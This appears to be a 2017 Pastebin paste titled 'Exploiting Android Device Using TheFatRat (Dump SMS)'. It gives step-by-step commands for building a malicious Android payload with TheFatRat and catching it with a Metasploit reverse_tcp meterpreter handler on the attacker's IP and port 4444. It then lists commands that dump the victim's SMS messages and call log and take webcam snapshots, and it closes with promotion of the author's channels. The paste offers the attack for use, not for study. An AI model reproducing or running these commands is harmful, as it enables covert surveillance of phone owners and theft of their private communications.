Professional-hacker

Exploiting Android Device Using TheFatRat (Dump SMS)

Jan 15th, 2017
421
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.11 KB | None | 0 0
  1. ##################################################JokerSecurity###############################################################
  2. # Title : Exploiting Android Device Using TheFatRat (Dump SMS)
  3. # Tested On : [ Kali-Linux ]
  4. # MyChannel Youtube : https://www.youtube.com/channel/UCPRRAzu8dMWxChn-RruC-eg/videos
  5. # Myblog : http://kader-information.blogspot.com/
  6. # Link video : https://www.youtube.com/watch?v=RGOLfaI3Vbo
  7. ######################
  8. # [+] COMMENDS :
  9. ######################
  10. create Payload :
  11. ================
  12. cd TheFatRat
  13. ./fatrat
  14.  
  15. commend metasploit
  16. use exploit/multi/handler
  17. set PAYLOAD android/meterpreter/reverse_tcp
  18. set LHOST (your-ip)_
  19. set LPORT 4444
  20. exploit
  21. sysinfo
  22. help
  23. dump_calllog
  24. dump_sms
  25. webcam_snap
  26.  
  27.  
  28. subscribe for my channel and page in facebook
  29.  
  30. # My Blogger : http://kader-information.blogspot.com/
  31.  
  32. # Page FacebOOk : https://www.facebook.com/AnonymousPalestine.vip
  33.  
  34. # Page FacebOOk 2 : https://www.facebook.com/Professional.hacker.25
  35.  
  36. By <3
  37.  
  38. ##################################################JokerSecurity###############################################################
Add Comment
Please, Sign In to add comment